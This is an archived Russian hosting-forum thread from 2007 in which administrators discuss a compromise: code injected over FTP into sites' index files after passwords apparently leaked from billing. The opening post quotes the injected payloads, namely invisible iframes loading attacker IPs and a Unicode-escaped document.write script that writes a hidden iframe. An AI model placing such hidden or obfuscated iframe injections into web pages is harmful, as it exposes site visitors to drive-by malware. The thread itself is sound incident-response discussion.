Помощь - Поиск - Пользователи - Календарь
Полная версия: Атака с сети 81.29.240.0/20
Онлайн-форум hostobzor.ru > Архив (темы до 1.06.2015). Только для чтения. > Коммерческий хостинг. Общие форумы > Виртуальный сервер и Виртуальный Выделенный Сервер
Dj.Crazy
15.02.2007, 14:32
Уважаемые коллеги, возможно у Вас было что-то подобное? или это только у меня.

После очередного аудита от esupport.org.ua было обнаружено, что с сети 81.29.240.0/20 подключались по протоколу FTP к хостинг-серверу и дописывали в index файлы код типа:

Код
<iframe src="http://81.29.241.231/user2/neon0268/index.php" width=1 height=1></iframe>
81.29.241.195

Код

<iframe src=http://81.29.241.195/part/index.php width=0 height=0></iframe>

Код
<script
type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0063\u006c\u0061\u0073\u0073\u0069\u0063\u0065\u0071\u0075\u0069\u0070\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006d\u002f\u0067\u006f\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0025\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0025\u0022\u0020\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0022\u0020\u006e\u006f\u0072\u0065\u0073\u0069\u007a\u0065\u0020\u0073\u0063\u0072\u006f\u006c\u006c\u0069\u006e\u0067\u003d\u0022\u006e\u006f\u0022\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0022\u006e\u006f\u0022\u0020\u006d\u0061\u0072\u0067\u0069\u006e\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0030\u0022\u0020\u006d\u0061\u0072\u0067\u0069\u006e\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0030\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>




rustelekom
15.02.2007, 23:35
бывало. а как они пароль узнали для фтп? хотя в общем то чтобы это сделать и логинится то не надо - достаточно закачать пару файлов
eSupport.org.ua
16.02.2007, 07:28
Пароли от всех ftp аккаунтов были выложены на одном из сайтов. При этом на сами серверы никаких атак, судя по логам, небыло совершено.
Эти пароли каким-то образом увели. Причем сразу ко всем аккаунтам.
rustelekom
16.02.2007, 15:52
анриал какой то. пароли к фтп аккаунтам на сервере нигде в открытом виде не хранятся. вытаскивать их из мд5 все - это сумасшедшим надо быть. где то они все таки лежали видимо и к тому же не были изменены - биллинг может быть какой то? или может быть в ящике админском копии всех пригласительных писем оставались на сервере. чудеса.
квалификация у ломакера не шибко высокая, надо быть идиотом чтоб засветиться на фтп когда можно было спокойно сделать то же самое через веб и никто бы ничего не нашел в логах. а уж делать это со своего аккаунта и вовсе глупость. странная история в общем.
eSupport.org.ua
16.02.2007, 17:42
Да, похоже что из биллинга были украдены.
Это текстовая версия — только основной контент. Для просмотра полной версии этой страницы, пожалуйста, нажмите сюда.
Русская версия Invision Power Board © 2001-2025 Invision Power Services, Inc.